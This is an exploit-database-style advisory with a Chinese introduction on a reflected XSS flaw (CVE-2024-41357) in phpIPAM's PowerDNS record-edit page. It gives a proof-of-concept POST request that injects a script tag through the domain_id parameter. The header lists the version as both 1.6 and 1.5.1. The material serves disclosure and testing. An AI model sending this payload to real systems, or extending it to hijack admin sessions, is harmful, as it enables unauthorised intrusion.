phpIPAM 1.6 反射型跨站脚本（XSS）漏洞分析与利用

本文详细介绍了phpIPAM 1.6版本中存在的反射型跨站脚本（XSS）漏洞（CVE-2024-41357），提供了概念验证（PoC）的利用方法。攻击者可以通过构造特制的POST请求，在管理员的浏览器环境中执行任意JavaScript代码，从而可能导致会话劫持或进一步的攻击。

Exploit Title: phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS)

Date: 2025-11-25

Exploit Author: CodeSecLab

Vendor Homepage: https://github.com/phpipam/phpipam/

Software Link: https://github.com/phpipam/phpipam/

Version: 1.5.1

Tested on: Windows

CVE : CVE-2024-41357

Proof Of Concept

PoC to trigger XSS vulnerability in phpipam 1.6

Ensure you are logged in as an admin user to satisfy the admin check condition.

Send the following POST request to trigger the XSS vulnerability:

1
2
3
4
5
6


POST /app/admin/powerDNS/record-edit.php HTTP/1.1
Host: phpipam
Content-Type: application/x-www-form-urlencoded
Content-Length: <calculated_length>

action=add&domain_id=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

This will execute the alert(1) script when the response is rendered in the browser.

comments powered by Disqus